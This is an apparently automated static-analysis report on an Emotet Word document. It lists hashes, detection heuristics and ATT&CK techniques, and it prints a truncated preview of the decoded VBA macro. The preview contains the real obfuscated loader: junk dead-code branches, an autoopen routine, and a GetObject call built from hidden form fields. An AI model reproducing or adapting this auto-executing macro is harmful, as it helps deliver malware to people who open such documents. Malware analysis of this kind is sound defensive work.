Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 62338c8fa3a628c5…

MALICIOUS

Office (OLE)

Size: 236.4 KB
Created: 2019-04-02 15:02:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: f1d6788c04fd2285861ff321e7f69840
SHA-1: 1c04bb644d4d96a4fd6e7a6ff5a9bdaf2118d266
SHA-256: 62338c8fa3a628c5875f1272b7b6578096dc4e03c5b402c3c9bd1b4fb191f66c
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922287-0', strongly indicating the Emotet family. The presence of an AutoOpen VBA macro that utilizes GetObject suggests an attempt to execute code. This macro is likely responsible for downloading and executing a secondary payload, a common Emotet tactic.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6922287-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6922287-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34070 bytes
SHA-256: 5ccb853a1043ff80b3fca5d1078744dd24e455e2dfb78c845fabf773317f3d35
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "DUBAxA1C"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sGCcQGC"
Attribute VB_Base = "0{E48F21A4-E25E-46DD-B29C-3FC3C8831164}{45563A9E-A579-4F28-9D58-2AD67FB1BDFC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "cXQAAX_"
Attribute VB_Base = "0{0FF1F712-F99E-4AFE-B7EF-B278116B2C74}{D461E878-AF2D-4002-98E4-A54BECC37E93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "iXAQAoUB"
Function P1BQBAc()
   If 685347892 = 465836721 Then
jAwQ4co = PAx_wBAA + Int(872513670 * Asc(CoxAwBoC) + JACAAAC1 _
/ 760193934) + pD1cXQ / CLng(qDAAA4Qx) - (okCDcko - QA1Ak1AA / 515736157 - Tan _
(BAAAA4D) + (HA1DAc / CSng(kDADkQ) + _
628627787 / Sgn(668312410) * (kD1AA1CQ + CVar(440692586))))
End If
   If 556256982 = 171198999 Then
K1CZxQ = pAA_ooA + Int(914518761 * Asc(HBkABx) + dcDADBZ _
/ 653991142) + zAQA4Ukw / CLng(IBcAAQA) - (tACBQX - uACcwC / 59698149 - Tan _
(MDCAwAAA) + (zAAQAA_A / CSng(RABB_w) + _
479261298 / Sgn(732657915) * (uA_Z1CAA + CVar(659473347))))
End If
End Function
Function UAAx4XCA()
   If 668622730 = 860973434 Then
k4AGxQw = LAAAZAD + Int(140046170 * Asc(hBkkAc1) + FA11AoQA _
/ 902194132) + oDxZDDD / CLng(wAQDAQUB) - (jAAwwB - iBco_QBA / 568662360 - Tan _
(BQAUBAQ) + (z_AcAUGA / CSng(oCXDAcBA) + _
867659984 / Sgn(729640376) * (LoC_AQx + CVar(594599142))))
End If
   If 611394209 = 924002705 Then
GQQDBA = ECAAAAA4 + Int(653631988 * Asc(kADAAUAA) + AoxACA _
/ 827510914) + BoABcGU / CLng(jAAAAAx) - (GoCUBcQD - zBAwAkAc / 667955069 - Tan _
(nZAGkUX) + (zxwBUc4 / CSng(CAAB4A) + _
646578554 / Sgn(62567745) * (qCADBA + CVar(365051777))))
End If
   If 451294204 = 397593678 Then
oUAAoAwD = LU4BBB + Int(29834912 * Asc(wQBDcQ) + h_AAAAGc _
/ 512704388) + u_AC_DA / CLng(voUAAAA) - (RAcAUBoA - YCBDUA / 250750541 - Tan _
(qUcAQD) + (DcBAXADA / CSng(rAAAUDA) + _
755215115 / Sgn(518274294) * (wQA4ADQ + CVar(341558933))))
End If
End Function
Sub autoopen()
JUDABAxk
End Sub
Function JUDABAxk()
On Error Resume Next
   If 524954559 = 694033146 Then
zBZAUk = vADXAA4A + Int(50909396 * Asc(oAQXAQ_A) + LGAAAoB4 _
/ 327919985) + XDAcCA / CLng(bQZ_QAUX) - (mCCZcG - sAxAXUD / 591440269 - Tan _
(WX1DAwx) + (LBXAUADB / CSng(zDGxZ1U) + _
941632738 / Sgn(477275187) * (SXBDA_CD + CVar(603234311))))
End If
   If 572870490 = 713176209 Then
zAZAUAGc = ao1XxA + Int(223507896 * Asc(iQXA4_U) + UQwAABDB _
/ 148076729) + GZBXBG / CLng(XABAQXok) - (tBUoU4x - kAkAc1G / 394973492 - Tan _
(wUCCo_wB) + (lAA1AAD / CSng(pAXADA) + _
387925593 / Sgn(338581344) * (SkAAwAwC + CVar(885372181))))
End If
   If 928101583 = 593705680 Then
w14AG_AA = KAooABAX + Int(708239812 * Asc(ko1cAwA) + c_QAcA _
/ 768636761) + NUAA4oAU / CLng(DBAo41wA) - (bAcBZAU - ukAAQ_G / 936691701 - Tan _
(VDAoDU) + (iAAAA_CA / CSng(oBAA4CAA) + _
268913739 / Sgn(527390299) * (wAokAAQ + CVar(351548297))))
End If
Set zDUB1A = GetObject(sGCcQGC.cAAUAw.ControlSource + cXQAAX_.lAAAUQ + sGCcQGC.cAAUAw)
   If 224193205 = 413038928 Then
SBC4CxAk = oxD_cAQ + Int(942230367 * Asc(aAcxXAAU) + QccQAAA _
/ 959437093) + LAADADwB / CLng(t1xQUk) - (V4cwZoAA - qDABA4 / 561286447 - Tan _
(vABkZZD) + (z_UQA1 / CSng(sxAxxA) + _
316950408 / Sgn(916257096) * (WAkAcA + CVar(755676757))))
End If
   If 64324555 = 254697076 Then
JXDADAZ = C1DADUA + Int(716349119 * Asc(OCxAAB) + SAwAAAA4 _
/ 449378208) + iXCDQA / CLng(JQUBX1) - (WX11_Ao - JABAAQ / 266439163 - Tan _
(FxDB_Ac) + (IGDx4UXZ / CSng(jQ41Qw) + _
374904340 / Sgn(104014167) * (scABUXA + CVar(101443024)))
... (truncated)